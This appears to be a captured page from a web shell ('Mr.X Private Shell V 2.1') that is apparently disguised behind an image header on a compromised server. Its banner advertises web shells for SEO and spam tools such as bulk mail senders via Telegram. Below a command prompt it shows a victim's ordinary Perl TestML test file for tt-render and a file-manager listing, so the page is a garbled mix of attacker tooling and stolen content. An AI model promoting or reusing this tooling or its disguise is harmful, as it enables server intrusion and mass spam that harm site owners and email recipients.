����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
use lib 'inc';

use TestML;

TestML->new(
    testml => do { local $/; <DATA> },
    bridge => 'main',
)->run;

{
    package main;
    use base 'TestML::Bridge';
    use TestML::Util;

    sub run_command {
        my ($self, $command) = @_;
        $command = $command->value;
        if (-d 'test') {
            $command =~ s/\bt\b/test/g;
        }
        open my $execution, "$^X bin/$command |"
        or die "Couldn't open subprocess: $!\n";
        local $/;
        my $output = <$execution>;
        close $execution;
        return str $output;
    }

    sub expected {
        return str <<'...';
Hi Löver,

Have a nice day.

Smööches, Ingy
...
    }
}

__DATA__
%TestML 0.1.0

Plan = 3;

*command.Chomp.run_command == expected();

=== Render
--- command
tt-render --post-chomp --data=t/render.yaml --path=t/template/ letter.tt

=== Render with path//template
--- command
tt-render --post-chomp --data=t/render.yaml t/template//letter.tt

=== Options abbreviated
--- command
tt-render --post-c --d=t/render.yaml -I t/template/ letter.tt

Filemanager

Name Type Size Permission Actions
template Folder 0755
000-compile-modules.t File 242 B 0644
cli.t File 1.03 KB 0644
release-pod-syntax.t File 302 B 0644
render.json File 24 B 0644
render.xml File 35 B 0644
render.yaml File 13 B 0644
render_json.t File 762 B 0644
render_xml.t File 767 B 0644
render_yaml.t File 661 B 0644